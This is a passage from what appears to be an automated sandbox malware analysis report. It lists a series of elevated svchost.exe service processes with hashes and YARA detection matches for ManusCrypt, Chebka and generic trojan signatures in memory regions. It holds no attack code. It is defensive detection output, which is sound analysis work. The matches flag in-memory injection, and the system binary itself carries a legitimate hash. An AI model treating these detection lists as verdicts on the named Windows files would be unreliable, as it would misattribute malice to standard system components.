                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:23
                                                          Start time:10:16:55
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:25
                                                          Start time:10:16:59
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:27
                                                          Start time:10:17:02
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:28
                                                          Start time:10:17:07
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:29
                                                          Start time:10:17:09
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:30
                                                          Start time:10:17:12
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:32
                                                          Start time:10:17:17
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:33
                                                          Start time:10:17:19
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:34
                                                          Start time:10:17:22
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:35
                                                          Start time:10:17:24
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:36
                                                          Start time:10:17:33
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:37
                                                          Start time:10:17:37
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
